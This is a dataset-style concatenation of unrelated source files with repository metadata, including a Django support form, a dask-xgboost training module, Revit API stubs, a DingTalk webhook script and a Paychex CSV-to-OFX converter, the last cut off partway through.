help_text=_("Please select your browser from the list, or 'Other' to enter an alternative"),
required=False)
browser_text=forms.CharField(required=False, label=_("Browser Description"), help_text=_("Please describe your browser"))
def __init__(self, *args, **kwargs):
super(SupportIssueForm, self).__init__(*args, **kwargs)
self.fields["browser"].choices = [('',''),] + [(b.key, b.value,) for b in models.BrowserPickListItem.objects.all()] + [('other', 'Other',),]
def clean(self):
cleaned_data = self.cleaned_data
for val in self.fields['contact_type'].choices:
if val[0] == cleaned_data.get('contact_type'):
cleaned_data["contact_type_pretty"] = val[1]
for val in self.fields['browser'].choices:
if val[0] == cleaned_data.get('browser') and cleaned_data.get('browser') != 'other':
cleaned_data["browser_text"] = val[1]
return cleaned_data
def clean_contact_email(self):
contact_type = self.cleaned_data.get("contact_type")
email = self.cleaned_data.get("contact_email")
if contact_type == "email":
if not email:
raise forms.ValidationError(_("Please supply an e-mail address"))
else:
self.cleaned_data["contact_point"] = email
return email
def clean_contact_phone(self):
contact_type = self.cleaned_data.get("contact_type")
phone = self.cleaned_data.get("contact_phone")
if contact_type == "phone":
if not phone:
raise forms.ValidationError(_("Please supply a phone number"))
else:
self.cleaned_data["contact_point"] = phone
return phone
def clean_browser_text(self):
browser_text = self.cleaned_data.get("browser_text")
browser = self.cleaned_data.get("browser")
if browser:
if not browser == "other":
browser_text = models.BrowserPickListItem.objects.get(key=browser).value
elif not browser_text:
raise forms.ValidationError(_("Please describe your browser"))
return browser_text
class DataLoadUploadIssueForm(SupportIssueForm):
issue_reason = forms.ChoiceField(required=True, label=_("Reason"),
help_text="Please select the issue you are experiencing, or 'Other' if it isn't listed")
issue_reason_text = forms.CharField(required=False, label=_("Description"))
file_format=forms.ChoiceField(required=True, label=_("Format"),
help_text="Please select the format of the file you are attempting to load, or 'Other' to enter another format")
file_format_text=forms.CharField(required=False, label=_("File Format Description"), help_text=_("Please describe your file format"))
def __init__(self, *args, **kwargs):
super(DataLoadUploadIssueForm, self).__init__(*args, **kwargs)
self.fields["file_format"].choices = [(b.key, b.value,) for b in models.FileFormatPickListItem.objects.all()] + [('other', 'Other',),]
self.fields["issue_reason"].choices = [(b.key, b.value,) for b in models.DataLoadReasonPickListItem.objects.all()] + [('other', 'Other',),]
def clean_file_format_text(self):
file_format_text = self.cleaned_data.get("file_format_text")
file_format = self.cleaned_data.get("file_format")
if file_format:
if not file_format == "other":
file_format_text = models.FileFormatPickListItem.objects.get(key=file_format).value
elif not file_format_text:
raise forms.ValidationError(_("Please describe your file format"))
return file_format_text
def clean_issue_reason_text(self):
issue_reason_text = self.cleaned_data.get("issue_reason_text")
issue_reason=self.cleaned_data.get("issue_reason")
if not issue_reason == "other":
issue_reason_text = models.DataLoadReasonPickListItem.objects.get(key=issue_reason).value
elif not issue_reason_text:
raise forms.ValidationError(_("Please describe your data loading issue"))
return issue_reason_text
class DataLoadIgnoredFieldsIssueForm(SupportIssueForm):
"""
Form for reporting ignored data in transformation
"""
elements = forms.CharField(required=True, widget=widgets.Textarea, help_text=_("Please edit this list to highlight the elements or attributes for which you would like support"))
comments = forms.CharField(required=False, widget=widgets.Textarea,
label=_("Additional Comments"),
help_text=_("Any additional information about your data or the issue you are experiencing that could be helpful"))
class AugmentationIssueForm(SupportIssueForm):
"""
Form for data augmentation support.
Requires that the `profile_json` field be populated with a JSON snapshot of the dataset
"""
profile_json = forms.CharField(required=True, widget=widgets.HiddenInput)
field_name = forms.CharField(required=False,
label="Augmented Field",
help_text=_("Enter a label to highlight a particular field"))
comments = forms.CharField(required=False, widget=widgets.Textarea,
label=_("Additional Comments"),
help_text=_("Any additional information about your data or the issue you are experiencing that could be helpful"))
def clean_profile_json(self):
try:
return json.loads(self.cleaned_data.get("profile_json"))
except:
raise forms.ValidationError(_("Invalid profile description"))
|
[
"dfeeney@gmail.com"
] |
dfeeney@gmail.com
|
bc6753a7cd0f2642d7b4b8c2e587b1fdbd850bd8
|
33ce95a46bad431fb9acde07f10f472c43533824
|
/functions_advanced_lab/absolute_values.py
|
0e7d743dc7d8b0c0dd460d48eb7f661c1730c4b7
|
[] |
no_license
|
ivan-yosifov88/python_advanced
|
91dead1a44771a46e85cecdfc6b02e11c0cb4d91
|
21830aabc87eb28eb32bf3c070bf202b4740f628
|
refs/heads/main
| 2023-06-29T21:31:30.285019
| 2021-06-23T20:31:36
| 2021-06-23T20:31:36
| 342,571,734
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 234
|
py
|
def read_input():
list_of_numbers = [float(num) for num in input().split()]
return list_of_numbers
def print_result(numbers_list):
print([abs(num) for num in numbers_list])
numbers = read_input()
print_result(numbers)
|
[
"ivan.yosifov88gmail.com"
] |
ivan.yosifov88gmail.com
|
93a13f5c7aae90aafc40f7680b9fdc982234540b
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_172/ch73_2020_04_22_12_07_59_451590.py
|
7d390abc9a0f7b282992c69a56b50822905358f1
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 273
|
py
|
def remove_vogais(palavra):
i = 0
while i < len(palavra):
if palavra[i] == 'a' or palavra[i] == 'e' or palavra[i] == 'i' or palavra[i] == 'o' or palavra[i] == 'u':
del palavra[i]
i+=1
else:
i+=1
return palavra
|
[
"you@example.com"
] |
you@example.com
|
7cf703c9e6a3e84f639e61fbb79d305d183c1026
|
73758dde83d1a1823c103e1a4ba71e7c95168f71
|
/nsd2006/devops/day02/dingtalk.py
|
f09a620f5c3c08dd4c56aa692938ff3c8368b2ce
|
[] |
no_license
|
tonggh220/md_5_nsd_notes
|
07ffdee7c23963a7a461f2a2340143b0e97bd9e1
|
a58a021ad4c7fbdf7df327424dc518f4044c5116
|
refs/heads/master
| 2023-07-02T01:34:38.798929
| 2021-05-12T08:48:40
| 2021-05-12T08:48:40
| 393,885,415
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 960
|
py
|
import requests
import json
url = ''
headers = {'Content-Type': 'application/json; charset=UTF-8'}
# data = {
# "msgtype": "text",
# "text": {
# "content": "我就是我, 是不一样的烟火 好好学习天天向上"
# },
# "at": { # @哪些电话号码
# "atMobiles": [
# # "156xxxx8827",
# # "189xxxx8325"
# ],
# "isAtAll": False # 是否@所有人
# }
# }
data = {
"msgtype": "markdown",
"markdown": {
"title": "Offer",
"text": """## 入职邀请
您已被我公司录取,请于2020-12-10来报到,公司详情参见:[TEDU](http://www.tedu.cn)

好好学习天天向上"""
},
"at": {
"atMobiles": [
# "150XXXXXXXX"
],
"isAtAll": False
}
}
r = requests.post(url, headers=headers, data=json.dumps(data))
print(r.json())
|
[
"zhangzg@tedu.cn"
] |
zhangzg@tedu.cn
|
4f1d9ab5863aa6c57561c239f1fac7c3dcaad503
|
4b7b46a6d0f8ebeb544ff4b213a9c710e4db59c1
|
/src/make_select_occultation_times_table.py
|
37167b9a48f724cf579391caca8ae2f839332f1f
|
[] |
no_license
|
lgbouma/WASP-4b_anomaly
|
7eb44a54af553298075c69a3e4f7d9ea607bb762
|
124b0bb9912e43d47d98f6dfc390be7ef9823095
|
refs/heads/master
| 2021-08-19T20:28:18.577334
| 2020-04-11T17:49:09
| 2020-04-11T17:49:09
| 160,554,122
| 0
| 0
| null | 2020-02-09T14:13:21
| 2018-12-05T17:27:01
|
TeX
|
UTF-8
|
Python
| false
| false
| 2,054
|
py
|
# -*- coding: utf-8 -*-
'''
make table of selected transit times
'''
from __future__ import division, print_function
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt, pandas as pd, numpy as np
from glob import glob
import os, pickle
def get_data(
datacsv='../data/WASP-18b_literature_and_TESS_times_O-C_vs_epoch_selected.csv'
):
# need to run make_parameter_vs_epoch_plots.py first; this generates the
# SELECTED epochs (x values), mid-times (y values), and mid-time errors
# (sigma_y).
df = pd.read_csv(datacsv, sep=';')
return df
def main():
plname = 'WASP-4b'
allseldatapath = (
'/home/luke/Dropbox/proj/tessorbitaldecay/data/'+
'{:s}_occultation_times_selected.csv'.
format(plname)
)
df = get_data(datacsv=allseldatapath)
midpoints = np.array(df['sel_occ_times_BJD_TDB'])
uncertainty = np.array(df['err_sel_occ_times_BJD_TDB'])
epochs = np.array(df['sel_epoch']).astype(int)
original_references = np.array(df['original_reference'])
references = []
for ref in original_references:
if ref == '2011A&A...530A...5C':
references.append('\citet{caceres_ground-based_2011}')
elif ref == '2011ApJ...727...23B':
references.append('\citet{beerer_secondary_2011}')
elif ref == '2015MNRAS.454.3002Z':
references.append('\citet{zhou_secondary_2015}')
references = np.array(references)
outdf = pd.DataFrame(
{'midpoints': np.round(midpoints,5),
'uncertainty': np.round(uncertainty,5),
'epochs': epochs,
'original_reference': references
}
)
outdf['midpoints'] = outdf['midpoints'].map('{:.5f}'.format)
outdf = outdf[
['midpoints', 'uncertainty', 'epochs', 'original_reference']
]
outpath = 'selected_occultation_times.tex'
with open(outpath,'w') as tf:
print('wrote {:s}'.format(outpath))
tf.write(outdf.to_latex(index=False, escape=False))
if __name__=="__main__":
main()
|
[
"lgbouma@mit.edu"
] |
lgbouma@mit.edu
|
335248f2dc979c968e6eebcf946bc83489b010b2
|
afbae26b958b5ef20548402a65002dcc8e55b66a
|
/release/stubs.min/Autodesk/Revit/DB/__init___parts/FilterDoubleRule.py
|
27c4478ffdcdb2e5d8a367b3b2f1c85017c412ed
|
[
"MIT"
] |
permissive
|
gtalarico/ironpython-stubs
|
d875cb8932c7644f807dc6fde9dd513d159e4f5c
|
c7f6a6cb197e3949e40a4880a0b2a44e72d0a940
|
refs/heads/master
| 2023-07-12T01:43:47.295560
| 2022-05-23T18:12:06
| 2022-05-23T18:12:06
| 95,340,553
| 235
| 88
|
NOASSERTION
| 2023-07-05T06:36:28
| 2017-06-25T05:30:46
|
Python
|
UTF-8
|
Python
| false
| false
| 1,749
|
py
|
class FilterDoubleRule(FilterNumericValueRule,IDisposable):
"""
A filter rule that operates on double-precision numeric values in a Revit project.
FilterDoubleRule(valueProvider: FilterableValueProvider,evaluator: FilterNumericRuleEvaluator,ruleValue: float,epsilon: float)
"""
def Dispose(self):
""" Dispose(self: FilterRule,A_0: bool) """
pass
def ReleaseUnmanagedResources(self,*args):
""" ReleaseUnmanagedResources(self: FilterRule,disposing: bool) """
pass
def __enter__(self,*args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self,*args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod
def __new__(self,valueProvider,evaluator,ruleValue,epsilon):
""" __new__(cls: type,valueProvider: FilterableValueProvider,evaluator: FilterNumericRuleEvaluator,ruleValue: float,epsilon: float) """
pass
Epsilon=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""The tolerance within which two floating-point values may be considered equal.
Get: Epsilon(self: FilterDoubleRule) -> float
Set: Epsilon(self: FilterDoubleRule)=value
"""
RuleValue=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""The user-supplied value against which values from a Revit document will be tested.
Get: RuleValue(self: FilterDoubleRule) -> float
Set: RuleValue(self: FilterDoubleRule)=value
"""
|
[
"gtalarico@gmail.com"
] |
gtalarico@gmail.com
|
5be03d61a8e343b861e064451418f9530ddfa6e1
|
28a3860f80ff80ae3ce0650f99a7b8e00fbfdb4f
|
/compredospequenos/viviremediavenv/bin/futurize
|
e5e7466a0a3f40107a8ec3ef9ac5ee6fc7c3dd59
|
[] |
no_license
|
ladislauadri/compredospequenos
|
3a47f9433c2a6c389c2b02c04b587e70c5fb1168
|
639d44c0488700b0bb359e83c16ee9c6302aad17
|
refs/heads/main
| 2023-03-08T07:27:12.970315
| 2021-02-18T10:56:49
| 2021-02-18T10:56:49
| 339,982,844
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 425
|
#!/var/django/compredospequenos/viviremediavenv/bin/python3
# EASY-INSTALL-ENTRY-SCRIPT: 'future==0.18.2','console_scripts','futurize'
__requires__ = 'future==0.18.2'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('future==0.18.2', 'console_scripts', 'futurize')()
)
|
[
"kurunko@hotmail.com"
] |
kurunko@hotmail.com
|
|
48bffe0c9f300459f379cdb715aa7d5b13343fa1
|
9e401071eb220b299df1fec0be5a6da0976d6a9b
|
/wordlioud.py
|
1c478e796e64b6dca0635812380a1582a769f39b
|
[] |
no_license
|
skyshu/WordCloudExample
|
543ccc4eeacf5a4962cefee3f9cf9912f5b5dc2b
|
f44311bcdc4e05af7eab2700833436698ff27964
|
refs/heads/master
| 2021-01-21T17:57:30.420006
| 2017-05-22T04:08:41
| 2017-05-22T04:08:41
| 92,003,767
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,474
|
py
|
#coding:utf-8
from os import path
from scipy.misc import imread
import matplotlib.pyplot as plt
import jieba
import codecs
from wordcloud import WordCloud, ImageColorGenerator
# 获取当前文件路径
# __file__ 为当前文件, 在ide中运行此行会报错,可改为
# d = path.dirname('.')
d = path.dirname(__file__)
# 读取文本 alice.txt 在包文件的example目录下
text = open(path.join(d, 'alice.txt')).read()
#中文分割
cut_text = " ".join(jieba.cut(text))
# read the mask / color image
# 设置背景图片
alice_coloring = imread(path.join(d, "love.png"))
wc = WordCloud(
#设置中文字体
font_path="HYQiHei-25J.ttf",
#背景颜色
background_color="white",
#词云显示的最大词数
max_words=200,
#设置背景图片
mask=alice_coloring,
#字体最大值
max_font_size=80,
)
# 生成词云,也可以我们计算好词频后使用generate_from_frequencies函数
wc.generate(cut_text)
#fre = {u'吃饭':100,u'睡觉':20,u'打豆豆':80}
# 不加u会乱码
#wc.generate_from_frequencies(fre)
#从背景图片生成颜色值
image_colors = ImageColorGenerator(alice_coloring)
# 显示默认词云
plt.imshow(wc)
plt.axis("off")
# 绘制以图片色彩为背景的词云
plt.figure()
plt.imshow(wc.recolor(color_func=image_colors))
plt.axis("off")
# 绘制原图像
#plt.figure()
#plt.imshow(alice_coloring, cmap=plt.cm.gray)
#plt.axis("off")
plt.show()
# 保存图片
wc.to_file(path.join(d, "LOVE.png"))
|
[
"="
] |
=
|
cbe4a683f083cefc8d159895afa7eb75d352e5c8
|
5b93930ce8280b3cbc7d6b955df0bfc5504ee99c
|
/nodes/Ramsundar18TensorFlow/D_Chapter3/D_Review/index.py
|
ee8d6792fe9cd217a56ecbb6f3b415dcf80f3fc2
|
[] |
no_license
|
nimra/module_gen
|
8749c8d29beb700cac57132232861eba4eb82331
|
2e0a4452548af4fefd4cb30ab9d08d7662122cf4
|
refs/heads/master
| 2022-03-04T09:35:12.443651
| 2019-10-26T04:40:49
| 2019-10-26T04:40:49
| 213,980,247
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,004
|
py
|
# Lawrence McAfee
# ~~~~~~~~ import ~~~~~~~~
from modules.node.HierNode import HierNode
from modules.node.LeafNode import LeafNode
from modules.node.Stage import Stage
from modules.node.block.CodeBlock import CodeBlock as cbk
from modules.node.block.ImageBlock import ImageBlock as ibk
from modules.node.block.MarkdownBlock import MarkdownBlock as mbk
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Review
# In this chapter, we’ve shown you how to build and train some simple learning systems
# in TensorFlow. We started by reviewing some foundational mathematical concepts
# including loss functions and gradient descent. We then introduced you to some new
# TensorFlow concepts such as placeholders, scopes, and TensorBoard. We ended the
# chapter with case studies that trained linear and logistic regression systems on toy
# datasets. We covered a lot of material in this chapter, and it’s OK if you haven’t yet
# internalized everything. The foundational material introduced here will be used
# throughout the remainder of this book.
# In Chapter 4, we will introduce you to your first deep learning model and to fully
# connected networks, and will show you how to define and train fully connected net‐
# works in TensorFlow. In following chapters, we will explore more complicated deep
# networks, but all of these architectures will use the same fundamental learning princi‐
# ples introduced in this chapter.
#
#
#
#
# Review | 79
#
#
# CHAPTER 4
# Fully Connected Deep Networks
#
#
#
#
# This chapter will introduce you to fully connected deep networks. Fully connected
# networks are the workhorses of deep learning, used for thousands of applications.
# The major advantage of fully connected networks is that they are “structure agnostic.”
# That is, no special assumptions need to be made about the input (for example, that
# the input consists of images or videos). We will make use of this generality to use fully
# connected deep networks to address a problem in chemical modeling later in this
# chapter.
# We delve briefly into the mathematical theory underpinning fully connected net‐
# works. In particular, we explore the concept that fully connected architectures are
# “universal approximators” capable of learning any function. This concept provides an
# explanation of the generality of fully connected architectures, but comes with many
# caveats that we discuss at some depth.
# While being structure agnostic makes fully connected networks very broadly applica‐
# ble, such networks do tend to have weaker performance than special-purpose net‐
# works tuned to the structure of a problem space. We will discuss some of the
# limitations of fully connected architectures later in this chapter.
#
# What Is a Fully Connected Deep Network?
# A fully connected neural network consists of a series of fully connected layers. A fully
# connected layer is a function from ℝm to ℝn. Each output dimension depends on
# each input dimension. Pictorially, a fully connected layer is represented as follows in
# Figure 4-1.
#
#
#
#
# 81
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Content(LeafNode):
def __init__(self):
super().__init__(
"Review",
# Stage.CROP_TEXT,
# Stage.CODE_BLOCKS,
# Stage.MARKDOWN_BLOCKS,
# Stage.FIGURES,
# Stage.EXERCISES,
# Stage.CUSTOMIZED,
)
self.add(mbk("# Review"))
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Review(HierNode):
def __init__(self):
super().__init__("Review")
self.add(Content())
# eof
|
[
"lawrence.mcafee@gmail.com"
] |
lawrence.mcafee@gmail.com
|
ad8a8be88f337d0531bf7228029cf49b62dfd7ff
|
59a688e68421794af64bfe69a74f64b2c80cd79d
|
/math_numbers/number_relations.py
|
54380ae099fc73542c01e7baa6c84156986a75ef
|
[] |
no_license
|
hearues-zueke-github/python_programs
|
f23469b306e057512aadecad0ca0a02705667a15
|
d24f04ca143aa93f172210a4b9dfdd9bf1b79a15
|
refs/heads/master
| 2023-07-26T00:36:56.512635
| 2023-07-17T12:35:16
| 2023-07-17T12:35:16
| 117,093,746
| 6
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,649
|
py
|
#! /usr/bin/python3.5
import decimal
import math
import numpy as np
import matplotlib.pyplot as plt
from decimal import Decimal as D
from functools import reduce
decimal.getcontext().prec = 2000
def to_digit_list(n):
return list(map(int, list(str(n))))
''' Number manipulation functions '''
def digit_sum(n):
return np.sum(to_digit_list(n))
def digit_diff(n):
l = list(map(int, list(str(n))))
return int("".join(list(map(lambda a, b: str((a-b)%10), l[1:], l[:-1]))))
def digit_prod(n):
l = np.array(to_digit_list(n))
l[l==0] = 1
return np.prod(l)
a = 1234568
print("a: {}".format(a))
print("digit_sum(a): {}".format(digit_sum(a)))
print("digit_diff(a): {}".format(digit_diff(a)))
print("digit_prod(a): {}".format(digit_prod(a)))
n_max = 100000
l_dig_sums = [digit_sum(i) for i in range(0, n_max+1)]
l_dig_diffs = [0 for _ in range(0, 10)]+[digit_diff(i) for i in range(10, n_max+1)]
l_dig_prods = [digit_prod(i) for i in range(0, n_max+1)]
print("np.min(l_dig_sums): {}".format(np.min(l_dig_sums)))
print("np.min(l_dig_diffs): {}".format(np.min(l_dig_diffs)))
print("np.min(l_dig_prods): {}".format(np.min(l_dig_prods)))
print("np.max(l_dig_sums): {}".format(np.max(l_dig_sums)))
print("np.max(l_dig_diffs): {}".format(np.max(l_dig_diffs)))
print("np.max(l_dig_prods): {}".format(np.max(l_dig_prods)))
ls = []
for n in range(1, 1000):
l = [n]
j = n
for i in range(0, 10):
j = l_dig_sums[j]
l.append(j)
# j = l_dig_diffs[j]
# l.append(j)
j = l_dig_prods[j]
l.append(j)
ls.append((n, l))
for n, l in ls:
print("n: {}, l:\n{}".format(n, l))
|
[
"hziko314@gmail.com"
] |
hziko314@gmail.com
|
68d0876c783e333bac7aede80bfc8173d2d38b21
|
ee2181511a6e4165c348d3c20d01f81673650e33
|
/dask_xgboost/core.py
|
ca3b8309a75d1b557d7f0d7882ded76248b83891
|
[] |
no_license
|
sunyoubo/dask-xgboost
|
bf7f7ef20b39203145591911f44739748ae8debf
|
7cedc4fad9b82ce07bb90a9dd91f8a9cda84659e
|
refs/heads/master
| 2021-05-08T05:56:52.429563
| 2017-10-04T18:17:08
| 2017-10-04T18:17:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,518
|
py
|
from collections import defaultdict
import logging
from threading import Thread
import dask.dataframe as dd
import dask.array as da
import numpy as np
import pandas as pd
from toolz import first, assoc
from tornado import gen
from dask import delayed
from distributed.client import _wait
from distributed.utils import sync
import xgboost as xgb
from .tracker import RabitTracker
logger = logging.getLogger(__name__)
def parse_host_port(address):
if '://' in address:
address = address.rsplit('://', 1)[1]
host, port = address.split(':')
port = int(port)
return host, port
def start_tracker(host, n_workers):
""" Start Rabit tracker """
env = {'DMLC_NUM_WORKER': n_workers}
rabit = RabitTracker(hostIP=host, nslave=n_workers)
env.update(rabit.slave_envs())
rabit.start(n_workers)
logger.info("Starting Rabit Tracker")
thread = Thread(target=rabit.join)
thread.daemon = True
thread.start()
return env
def concat(L):
if isinstance(L[0], np.ndarray):
return np.concatenate(L, axis=0)
elif isinstance(L[0], (pd.DataFrame, pd.Series)):
return pd.concat(L, axis=0)
else:
raise TypeError("Data must be either numpy arrays or pandas dataframes"
". Got %s" % type(L[0]))
def train_part(env, param, list_of_parts, **kwargs):
"""
Run part of XGBoost distributed workload
This starts an xgboost.rabit slave, trains on provided data, and then shuts
down the xgboost.rabit slave
Returns
-------
model if rank zero, None otherwise
"""
data, labels = zip(*list_of_parts) # Prepare data
data = concat(data) # Concatenate many parts into one
labels = concat(labels)
dtrain = xgb.DMatrix(data, labels) # Convert to xgboost data structure
args = [('%s=%s' % item).encode() for item in env.items()]
xgb.rabit.init(args)
try:
logger.info("Starting Rabit, Rank %d", xgb.rabit.get_rank())
bst = xgb.train(param, dtrain, **kwargs)
if xgb.rabit.get_rank() == 0: # Only return from one worker
result = bst
else:
result = None
finally:
xgb.rabit.finalize()
return result
@gen.coroutine
def _train(client, params, data, labels, **kwargs):
"""
Asynchronous version of train
See Also
--------
train
"""
# Break apart Dask.array/dataframe into chunks/parts
data_parts = data.to_delayed()
label_parts = labels.to_delayed()
if isinstance(data_parts, np.ndarray):
assert data_parts.shape[1] == 1
data_parts = data_parts.flatten().tolist()
if isinstance(label_parts, np.ndarray):
assert label_parts.ndim == 1 or label_parts.shape[1] == 1
label_parts = label_parts.flatten().tolist()
# Arrange parts into pairs. This enforces co-locality
parts = list(map(delayed, zip(data_parts, label_parts)))
parts = client.compute(parts) # Start computation in the background
yield _wait(parts)
# Because XGBoost-python doesn't yet allow iterative training, we need to
# find the locations of all chunks and map them to particular Dask workers
key_to_part_dict = dict([(part.key, part) for part in parts])
who_has = yield client.scheduler.who_has(keys=[part.key for part in parts])
worker_map = defaultdict(list)
for key, workers in who_has.items():
worker_map[first(workers)].append(key_to_part_dict[key])
ncores = yield client.scheduler.ncores() # Number of cores per worker
# Start the XGBoost tracker on the Dask scheduler
host, port = parse_host_port(client.scheduler.address)
env = yield client._run_on_scheduler(start_tracker,
host.strip('/:'),
len(worker_map))
# Tell each worker to train on the chunks/parts that it has locally
futures = [client.submit(train_part, env,
assoc(params, 'nthreads', ncores[worker]),
list_of_parts, workers=worker, **kwargs)
for worker, list_of_parts in worker_map.items()]
# Get the results, only one will be non-None
results = yield client._gather(futures)
result = [v for v in results if v][0]
raise gen.Return(result)
def train(client, params, data, labels, **kwargs):
""" Train an XGBoost model on a Dask Cluster
This starts XGBoost on all Dask workers, moves input data to those workers,
and then calls ``xgboost.train`` on the inputs.
Parameters
----------
client: dask.distributed.Client
params: dict
Parameters to give to XGBoost (see xgb.Booster.train)
data: dask array or dask.dataframe
labels: dask.array or dask.dataframe
**kwargs:
Keywords to give to XGBoost
Examples
--------
>>> client = Client('scheduler-address:8786') # doctest: +SKIP
>>> data = dd.read_csv('s3://...') # doctest: +SKIP
>>> labels = data['outcome'] # doctest: +SKIP
>>> del data['outcome'] # doctest: +SKIP
>>> train(client, params, data, labels, **normal_kwargs) # doctest: +SKIP
<xgboost.core.Booster object at ...>
See Also
--------
predict
"""
return sync(client.loop, _train, client, params, data, labels, **kwargs)
def _predict_part(part, model=None):
xgb.rabit.init()
dm = xgb.DMatrix(part)
result = model.predict(dm)
xgb.rabit.finalize()
if isinstance(part, pd.DataFrame):
result = pd.Series(result, index=part.index, name='predictions')
return result
def predict(client, model, data):
""" Distributed prediction with XGBoost
Parameters
----------
client: dask.distributed.Client
model: xgboost.Booster
data: dask array or dataframe
Examples
--------
>>> client = Client('scheduler-address:8786') # doctest: +SKIP
>>> test_data = dd.read_csv('s3://...') # doctest: +SKIP
>>> model
<xgboost.core.Booster object at ...>
>>> predictions = predict(client, model, test_data) # doctest: +SKIP
Returns
-------
Dask.dataframe or dask.array, depending on the input data type
See Also
--------
train
"""
if isinstance(data, dd._Frame):
result = data.map_partitions(_predict_part, model=model)
elif isinstance(data, da.Array):
result = data.map_blocks(_predict_part, model=model, dtype=float,
drop_axis=1)
return result
|
[
"mrocklin@gmail.com"
] |
mrocklin@gmail.com
|
8a98a0654fc13703c66153234d7ba4d3b9c49692
|
4a7b5b3c2819dbf9b2bdfafcdf31745f88cf98b6
|
/jaraco/financial/paychex.py
|
40affd8d58d470882c7deae625312c3975f07cd9
|
[
"MIT"
] |
permissive
|
jaraco/jaraco.financial
|
7eb37fddc37e029ac38e162aaaf1a3bd1767a921
|
a5d0f996b2ee6bf9051d94d2a5656a1ca3f8b607
|
refs/heads/main
| 2023-09-01T15:12:26.069574
| 2023-08-06T23:45:05
| 2023-08-06T23:45:05
| 53,203,095
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,841
|
py
|
"""
Paychex, when they generate OFX downloads of their 401k account
data, their routine crashes and terminates output when it
encounters a Gain/Loss entry.
This routine takes instead the CSV output and generates a
proper OFX file suitable for importing into your favorite
accounting system.
"""
import itertools
import os
import copy
import decimal
import datetime
import logging
from textwrap import dedent
import autocommand
import ofxparse
import csv
log = logging.getLogger(__name__)
def header(ofx):
for field, value in ofx.headers.items():
yield f'{field}:{value}'
yield dedent(
f"""
<OFX>
<SIGNONMSGSRSV1>
<SONRS>
<STATUS>
<CODE>{ofx.signon.code}</CODE>
<SEVERITY>{ofx.signon.severity}</SEVERITY>
</STATUS>
<DTSERVER>{ofx.signon.dtserver}</DTSERVER>
<LANGUAGE>{ofx.signon.language}</LANGUAGE>
</SONRS>
</SIGNONMSGSRSV1>
"""
).strip()
yield dedent(
f"""
<INVSTMTMSGSRSV1>
<INVSTMTTRNRS>
<TRNUID>1</TRNUID>
<STATUS>
<CODE>0</CODE>
<SEVERITY>INFO</SEVERITY>
</STATUS>
<INVSTMTRS>
<DTASOF>{datetime.date.today().strftime("%Y%m%d")}</DTASOF>
<CURDEF>{ofx.account.statement.currency}</CURDEF>
<INVACCTFROM>
<BROKERID>{ofx.account.brokerid}</BROKERID>
<ACCTID>{ofx.account.account_id}</ACCTID>
</INVACCTFROM>
<INVTRANLIST>
<DTSTART>{ofx.account.statement.start_date.strftime("%Y%m%d")}</DTSTART>
<DTEND>{ofx.account.statement.end_date.strftime("%Y%m%d")}</DTEND>
"""
).strip()
tmpl = dedent(
"""
<{type}MF>
<INV{type}>
<INVTRAN>
<FITID>{abs_amount}{abs_shares}{price:0.6f}{row[Date]}</FITID>
<DTTRADE>{ofx_date}</DTTRADE>
<MEMO>{row[Transaction]}</MEMO>
</INVTRAN>
<SECID>
<UNIQUEID>{security.uniqueid}</UNIQUEID>
<UNIQUEIDTYPE>CUSIP</UNIQUEIDTYPE>
</SECID>
<UNITS>{abs_shares}</UNITS>
<UNITPRICE>{row[Price]}</UNITPRICE>
<TOTAL>{row[Amount]}</TOTAL>
<CURRENCY>
<CURRATE>1.0000</CURRATE>
<CURSYM>USD</CURSYM>
</CURRENCY>
<SUBACCTSEC>OTHER</SUBACCTSEC>
<SUBACCTFUND>OTHER</SUBACCTFUND>
</INV{type}>
<{type}TYPE>{type}</{type}TYPE>
</{type}MF>"""
).strip()
def to_ofx(row, securities):
if row['Shares'] == 'N/A':
return
amount = decimal.Decimal(row['Amount'])
price = decimal.Decimal(row['Price'])
shares = decimal.Decimal(row['Shares'])
type = 'SELL' if shares < 0 else 'BUY'
abs_amount = abs(amount)
abs_shares = abs(shares)
date = datetime.datetime.strptime(row['Date'], '%m/%d/%Y').date()
ofx_date = date.strftime('%Y%m%d')
security = securities[row['Ticker']]
yield tmpl.format_map(locals())
def footer(ofx):
"""
Given the original OFX template, extract the securities list.
"""
yield dedent(
"""
</INVTRANLIST>
</INVSTMTRS>
</INVSTMTTRNRS>
</INVSTMTMSGSRSV1>
<SECLISTMSGSRSV1>
<SECLIST>"""
).strip()
for sec in ofx.security_list:
yield dedent(
f"""
<MFINFO>
<SECINFO>
<SECID>
<UNIQUEID>{sec.uniqueid}</UNIQUEID>
